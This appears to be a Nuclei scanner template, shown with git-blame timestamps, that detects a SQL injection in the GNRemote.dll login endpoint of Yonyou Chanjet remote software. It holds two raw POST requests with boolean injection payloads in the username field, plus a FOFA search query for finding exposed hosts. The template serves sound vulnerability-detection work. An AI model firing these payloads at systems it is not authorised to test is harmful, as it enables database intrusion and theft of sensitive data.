nuclei-templates/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml

47 lines
1.7 KiB
YAML
Raw Normal View History

2023-09-15 12:23:57 +00:00
id: chanjet-gnremote-sqli
2023-08-18 03:22:06 +00:00
info:
2023-09-17 08:51:38 +00:00
name: Changjietong Remote Communication GNRemote.dll - SQL Injection
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: high
2023-09-15 12:23:57 +00:00
description: |
2023-09-17 08:51:38 +00:00
Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
2023-09-15 12:23:57 +00:00
reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
2023-10-14 11:27:55 +00:00
verified: true
2023-09-17 16:11:07 +00:00
max-request: 2
2023-09-15 12:23:57 +00:00
fofa-query: body="远程通CHANJET_Remote"
tags: yonyou,chanjet,sqli
2023-08-18 03:22:06 +00:00
http:
- raw:
- |
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
- |
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
matchers-condition: and
matchers:
- type: word
2023-09-15 12:23:57 +00:00
part: body_1
2023-08-18 03:22:06 +00:00
words:
- "{\"RetCode\":0}"
- type: word
2023-09-15 12:23:57 +00:00
part: body_2
2023-08-18 03:22:06 +00:00
words:
2023-10-14 11:27:55 +00:00
- "{\"RetCode\":2}"
# digest: 490a00463044022059409423f5601e69825c00301e9ca83b199ae9c096845f086a078ea4bfe41cd202207eeb445f38bc99afe1460593a4485d69e447595e78738b6a6e39640d54f9200c:922c64590222798bb761d5b6d8e72950